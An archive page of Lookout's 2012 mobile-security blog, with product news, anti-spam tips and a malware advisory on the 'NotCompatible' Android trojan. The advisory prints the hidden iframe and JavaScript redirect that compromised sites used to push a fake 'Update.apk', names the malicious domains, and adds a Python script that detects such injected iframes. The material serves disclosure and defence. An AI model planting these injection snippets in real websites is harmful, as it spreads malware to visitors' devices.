
The Lookout Blog

May 15, 2012

Lookout Around the World: Russian, Korean and Traditional Chinese Now Available

Hello, ni hao, 안녕하세요, приве́т!

The Lookout passport is getting pretty full. Our award-winning Android security app is now available on Google Play in Russian, Korean and Traditional Chinese. This is in addition to the previously localized versions of Lookout in German, French, Japanese, Spanish, Brazilian Portuguese, Polish and Simplified Chinese.

Users around the world can now keep their mobile device protected in their local language. With today’s additions, Lookout is now available in eleven different languages! Here are a few fun facts to celebrate today’s launch:

May 11, 2012

Mobile Spammers: Get To Them Before They Get To You

Let’s face it, making phone calls is so ten years ago. Text messaging is the dominant form of mobile communication, and spammers are chomping at the bit to take advantage of that. And when you think about how little the cost of engaging in such malicious activity really is, it’s no wonder U.S. spam texts rose 45 percent last year to 4.5 billion total messages. A prospective spammer needs just a prepaid phone with an unlimited texting plan to wreak SMS havoc on millions of unsuspecting victims, all of which they can do for a minimal $50-$100 fee. With returns that see no bounds, the only way to stop these perpetrators without government intervention is knowing how to protect yourself. Fortunately, Lookout’s got your back for that! Here are some steps you can take to ward off those pesky spammers:

Report spam texts to your carrier.

  • Supported by AT&T Inc., Verizon Wireless, Sprint Nextel Corp. or T-Mobile USA? Forward spam texts to '7726' to deter future wrongdoing. You can also use your carrier’s website or customer service line to block numbers from which you receive spam.

Register your mobile number with the FTC’s Do Not Call Registry.

  • Go to www.donotcall.gov and enter your digits. Numbers on this list will be off limits to potential spammers within a month of getting on the list. If unwarranted calls keep coming your way, you can report abusers on the same site.

Reply to unsolicited messages with “STOP” to prevent future texts from that sender.

  • Really, it’s that easy. When clicking on a spam link installs malware on your phone or authorizes premium charges on your phone bill, this is oftentimes your best mode of defense.

Use apps to cope with spam.

  • The Kedlin Company’s Call Control app for Android devices can block communication from unwanted numbers.

May 9, 2012

Quick Guide: How to Use Plan B to Find Your Lost Phone

Many of us have felt the pain of losing our most valuable accessory, have seen a friend panic because they misplaced their phone and it’s on silent, or have heard an announcement over a loud speaker asking if anyone has found a lost phone. If you find yourself in one of these desperate situations, you could be in luck. You can download Plan B, an innovative app that can help you find your phone after it goes missing!

While “Plan A” is not losing your phone (or already having a find-my-phone app like Lookout), Plan B is your last resort for locating your Android device.

Here’s a quick step-by-step guide on how to use Plan B to find your Android device if it goes missing:

  • Go to Google Play (formerly known as the Android Market). Make sure you visit the desktop web version, not the Google Play app on your phone, and search for Plan B, or go directly to the Plan B page.
  • Click Install. Plan B will then begin to remotely download on your phone.
  • As soon as it is finished installing (which does require a data connection), Plan B will send an email to your Gmail account telling you it is locating your phone.
  • Once Plan B has located your phone, check your Gmail again to find a link to a Google Map of your phone’s location. For 10 minutes Plan B will send you a series of emails with refined location updates – so be patient!
  • If your phone seems to be on the move, or you aren’t able to find your phone within 10 minutes of downloading Plan B, you can text yourself the word “locate” from a friend’s phone in order to start the locate process again.

While Plan B can locate your phone, it unfortunately can’t go and retrieve it for you. So if you find that your phone is in a location you are not familiar with, please contact the authorities who will be able to help you get it back.

If you want to be even more prepared, your “Plan A” should always be Lookout. That way, if your phone is ever lost or stolen, you can log into your Lookout account at mylookout.com and locate your phone on a map, then make it ‘scream’ once you get close!


May 9, 2012

Chief Financial Officer Displays a Sense of Humor with Cameo on Family Guy

No, this is not a headline from The Onion. It’s true! Our CFO, Adriel Lares, was on Family Guy this week. In the episode Leggo My Meg-O, Adriel can be seen in a CFO-appropriate blue suit and red tie. Image included below.

And since we started the conversation, here’s more on Adriel.

  • Relevant CFO-type facts: Before Lookout, Adriel was at Hewlett-Packard’s 3PAR Storage division. He led 3PAR’s IPO back in ’07 and grew its annual run rate to more than $200 million. He began his career as a treasury analyst for the Walt Disney Company. He likes cartoons!
  • Not-as-relevant facts: Adriel digs The Family Guy. He is also vintner of the finest Napa Cabernet known to man (self-proclaimed).

May 8, 2012

Sprint & Lookout Join Forces with Sprint Guardian

These days, it seems that kids of all ages are attached at the fingertip to the latest and coolest mobile devices. This isn’t your eyes playing tricks on you. This is Generation Mobile. A recent study[1] found that 38 percent of kids between the ages of 13 and 17 own a smartphone, and more than 75 percent of kids ages 2 to 13 have regular access to a smartphone!

Today, we’re excited to share that we’ve teamed up with Sprint on a new family product. Introducing Lookout Family, a new product that will enable Sprint customers to manage their phone security, find a family member’s missing device when it is lost or stolen, and back up precious data. Lookout Family is part of Sprint Guardian, a new product that provides a simple way for families to protect their children, and every mobile device in the household, with security and safety applications.

With the Lookout Family app, parents can safeguard their families against mobile threats including malware, spyware and phishing, in addition to tracking down lost phones and backing up precious data like family photos. Also, Lookout Family offers an easy way to set up and manage the security of multiple devices in the household. Lookout Family will be available as part of Sprint Guardian for Sprint family customers through the Sprint Zone.

At Lookout, we know that entire families—not just the adults—are using smartphones and that everyone needs to be kept safe and secure. Do your kids have smartphones? Tell us in the comments section!

May 7, 2012

Factory Reset Nightmare: How Lookout Saved John’s Data (and Day)

Lookout Super User: John Houchins

Occupation: Computer Network Technician

Location: Martinsburg, West Virginia

Device type: HTC EVO

John’s favorite Lookout feature: Backup

What does John use his phone for?  “I use my phone for just about everything. I have all of my work contacts on it, IM capabilities enabled, I keep notes in regards to ‘things to do’ both for home and work, and I love taking pictures with the camera.”

How Lookout saved the day for John:

“One day, when an Android update was pushed to my smartphone, I noticed my phone began reloading often: sometimes three or four times a day. I noticed this usually happened after I had accessed an application. A colleague of mine mentioned to me that he had been having the same problem and said that when he restored his phone’s factory defaults the problem ‘went away.’ In my haste to stop my phone from continually reloading I immediately went through the process to restore the phone back to factory settings. As it was rebooting I realized that this was not a great idea – as I had forgotten to back up my phone before resetting my device! As a technician on a computer network I know to ALWAYS back up your data BEFORE you do anything like this, but in a frenzy of frustration I had not thought this through.

“In many ways, a lot of my life is on/in this phone. While I was kicking myself thinking of all of the information I had lost, I suddenly remembered Lookout and immediately logged into the website. I couldn’t believe it, my data was all there and within minutes Lookout had pushed my contacts back to the phone. That was a lifesaver! Call histories, contact lists…all restored. VERY impressive; love it! Thanks Lookout.”

May 4, 2012

Update: Oh no, my phone bought tickets to the One Direction concert

Updated with further clarifications. 

In the 24 hours since we identified NotCompatible, we’ve seen detections on thousands of devices. If you’re just tuning in, NotCompatible is the first time that we’ve seen malware writers specifically targeting Android devices through compromised websites (see our original post for more). When visiting one of the infected sites from an Android device, the malware will automatically start downloading.  Then, NotCompatible poses as a security update to trick users into installing the downloaded file.  We’ve seen this trick before: GGTracker, discovered in 2011, was one of the first instances of Android-targeted drive-by downloads.  Once installed, NotCompatible acts as a proxy, thereby allowing its owner to transmit and receive network data through the infected device.

Based on our observations since initial detection, it appears that NotCompatible’s authors are using infected Android devices for online fraud.  Because legitimate sites often use the source of network data as a way to detect fraud, bad guys try to hide where they are coming from.  NotCompatible allows them to engage in fraud, while making their network traffic look like it is coming from legitimate mobile devices all around the world.  So far, we have observed attackers making various purchases—for example, tickets to a Red Hot Chili Peppers concert via TicketMaster and shopping on the Apple App Store.  Such network proxies are also a concern for Enterprise and Government because they can allow attackers to gain access to sensitive internal networks.  The good news is that there doesn’t appear to be any evidence that the people behind NotCompatible were targeting specific companies or governments.  Also, there doesn’t seem to be a way for the malware to update itself or compromise any information on your device—it’s a fairly simple network data proxy.   All Lookout users are protected from this threat.

May 4, 2012

Infographic: Grand Theft Mobile

Smartphones are valuable tools that help us navigate through everyday life: they’re our camera, MP3 Player, Rolodex, and GPS. Unfortunately, thieves think they are valuable too! According to law enforcement officials, phone theft is actually one of the fastest growing crimes in the U.S. Check out the infographic below to learn more about “Grand Theft Mobile,” and see how you can keep your smartphone safe!

May 2, 2012

UPDATE: Security Alert: Hacked Websites Serve Suspicious Android Apps (NotCompatible)

Update Two: Based on our current research,  NotCompatible is a new Android trojan that appears to serve as a simple TCP relay / proxy while posing as a system update. This threat does not currently appear to cause any direct harm to a target device, but could potentially be used to gain illicit access to private networks by turning an infected Android device into a proxy. As previously mentioned, this appears to be the first time that compromised websites have been used to distribute malware targeting Android devices.

Distribution of NotCompatible depends on compromised websites that have a hidden iframe at the bottom of each page. If a user visits a compromised website from an Android device, their mobile web browser will automatically begin downloading the NotCompatible application, named ‘Update.apk’. As with any drive-by download, a user needs to install the downloaded application before a device will be infected. Based on our initial investigation, we’ve confirmed that a number of websites have been compromised. However, affected sites appear to show relatively low traffic and we expect total impact to Android users to be low.

This specific sample, while relatively well constructed, does not appear to go to great lengths to hide its intended purpose: it can be used to access private networks. This feature in itself could be significant for system IT administrators: a device infected with NotCompatible could potentially be used to gain access to normally protected information or systems, such as those maintained by enterprise or government.

Update: All Lookout users are currently protected against NotCompatible.  Lookout protects users from drive-by downloads when the features File System Monitoring and Install Monitoring are active.  These additional layers of protection alert users to known threats when they are downloaded to device storage, such as the /Downloads folder on the SD Card, and immediately before they are installed via sideloading.

Hacked websites are frequently used to infect PCs with malware; however, today we have identified the first time hacked websites are being used to specifically target mobile devices.  Lookout is in the process of rolling out an update to protect against the new threat,  NotCompatible.

How it Works

In this specific attack, if a user visits a compromised website from an Android device, their web browser will automatically begin downloading an application—this process is commonly referred to as a drive-by download.

When the suspicious application finishes downloading, the device will display a notification prompting the user to click on the notification to install the downloaded app.  For the app to actually be installed, the device must have the “Unknown sources” setting enabled (installing apps this way is commonly referred to as “sideloading”).  If the device does not have the unknown sources setting enabled, the installation will be blocked.

(Screenshots originally posted by redditor, Georgiabiker)

Technical details

Infected websites commonly have the following code inserted into the bottom of each page:

<iframe
style="visibility: hidden; display: none; display: none;"
src="hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>

We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.

When a PC-based web browser accesses the site at gaoanalitics.info, a not found error is returned; however, if a web browser with the word “Android” in its user-agent header accesses the page, the following is returned:

<html><head></head><body><script type="text/javascript">window.top.location.href = "hxxp://androidonlinefix.info/fix1.php";</script></body></html>

This page causes the browser to immediately attempt to access the page at androidonlinefix.info.  Like the previous site, only browsers sending an Android User-Agent string will trigger a download (all other browsers will show a blank page).  When the page is visited from an Android browser, the server returns an Android application, which the browser downloads automatically.

Suspicious applications are currently served from the following sites:

  • gaoanalitics.info
  • androidonlinefix.info

Command and Control (C&C) domains include:

  • notcompatibleapp.eu
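
For site owners who want to check their own pages for the kind of injection described above, here is an added example (not Lookout's code and not part of the original post). It parses a page, flags iframes that are hidden and load from a different host than the site, and marks hosts that appear in the domain lists above. The site name shop.example, the other example hosts, the hidden-style heuristic and the function names are assumptions made for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

# Distribution and C&C domains listed in this post.
POST_DOMAINS = {"gaoanalitics.info", "androidonlinefix.info", "notcompatibleapp.eu"}
# Inline styles that hide an iframe (heuristic chosen for this example).
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def host_of(url):
    """Lower-cased host of a URL; accepts defanged hxxp:// as well."""
    url = re.sub(r"^hxxp", "http", url.strip(), flags=re.I)
    return (urlparse(url).hostname or "").lower()


class IframeAudit(HTMLParser):
    """Collect iframes that are hidden AND load from another host."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        host = host_of(a.get("src", ""))
        hidden = (bool(HIDDEN_STYLE.search(a.get("style", "")))
                  or a.get("width") == "0" or a.get("height") == "0")
        # Relative URLs and subdomains of the site count as same-site.
        offsite = (bool(host) and host != self.site_host
                   and not host.endswith("." + self.site_host))
        if hidden and offsite:
            self.findings.append({
                "line": self.getpos()[0],          # line of the tag in the page
                "host": host,
                "listed_in_post": host in POST_DOMAINS,
            })


def audit_page(html, site_host):
    """Return one finding per hidden off-site iframe in the page."""
    parser = IframeAudit(site_host)
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page for a site at shop.example (defanged URL as in the post).
SAMPLE = """<html><body>
<h1>Welcome</h1>
<iframe src="https://shop.example/banner.html" width="300" height="80"></iframe>
<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>
<iframe style="visibility: hidden; display: none;" src="hxxp://gaoanalitics.info/?id={constructed}"></iframe>
</body></html>"""

if __name__ == "__main__":
    print(audit_page(SAMPLE, "shop.example"))
```

Visible third-party embeds and hidden same-site frames are not reported, so a finding means both conditions held; a host that is not in the post's lists still deserves a look if nobody on the team added the frame.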

As Lookout identifies the extent of infected websites, we will update this blog post.

The Lookout security team is actively investigating the infected websites and suspicious application.  Refer back to this blog post for regular updates on this security alert.

April 30, 2012

New Anti-Malware Features Offer More Points of Protection

Today we’re excited to tell you about two new features in Lookout for Android: File System Monitoring and Install Monitoring. These free features provide added protection from malware and spyware, especially for people who like to download apps from a variety of different sources. Like Lookout’s core security functionality, these new features are powered by Lookout’s Mobile Threat Network.

If you download apps from alternative markets or other sources such as discussion forums (commonly referred to as “side-loading” apps), File System Monitoring and Install Monitoring add an extra level of protection for you. While Lookout already protects users from these types of applications by scanning them immediately upon install, these two new features offer unique ways to detect threats before they are installed on a device.

The ability to download apps from a variety of sources is considered one of the unique strengths of the Android platform. However, we generally advise people to use caution when “side-loading,” or downloading an app outside of the official Android Market (aka Google Play) in order to minimize the chance of encountering malware. We know a lot of our users like to explore everything on Android, even if that means downloading apps from a source you’ve never even heard of before. For these cases, File System Monitoring and Install Monitoring are here to protect you.

File System Monitoring

File System Monitoring actively watches your SD card for file changes. When a new app is downloaded to your SD card, but not yet installed, File System Monitoring will alert you in real time if it’s malware. This active monitoring is a much better watchdog for your SD card than a scheduled file system scan, and we’ve designed it in a way that won’t impact your battery life. A file system scan scheduled for Tuesday won’t tell you about the malware you downloaded on Wednesday for six days!

Power users, take note! Because File System Monitoring relies on its ability to ‘watch’ the SD card for changes, it works great for most methods of side-loading, such as when you download an app from the web or from email directly on your mobile device. In cases where you un-mount your SD card to transfer apps manually, File System Monitoring won’t be able to scan any new apps you may transfer. This is where Install Monitoring comes in…

Install Monitoring

Lookout for Android is the first security app to feature Install Monitoring, giving you the option to scan apps at the beginning of a side-load app installation process. When you tap on an .apk package to install it, Install Monitoring will prompt you to optionally scan the app before installing. If an app checks out as clean, installation proceeds as normal without any inconvenience to you. You can even set this as a default behavior so that Lookout will automatically conduct scans on all future side-load installs!

Note that when you get apps from Google Play, they’re automatically downloaded and installed on your device, so Lookout’s existing security scanning is still an essential facet of mobile protection for users.

If you are an existing Lookout Free or Lookout Premium user, install the latest update of Lookout for Android to access these features. You can turn off automatic File System Monitoring in Settings>Security in the Lookout app. You’ll also be able to set preferences for Install Monitoring the first time you install a side-loaded app through Android’s standard intent selection dialog, and thereafter through the ‘Launch By Default’ section of Lookout’s App info page in system settings.

We think that these new features really add an important new level of security for power users – they’re like monster tires for off-roading on your Android! Let us know what you think!

About this blog

This is the official blog of Lookout, a mobile security company in San Francisco. Find out more about us or our product.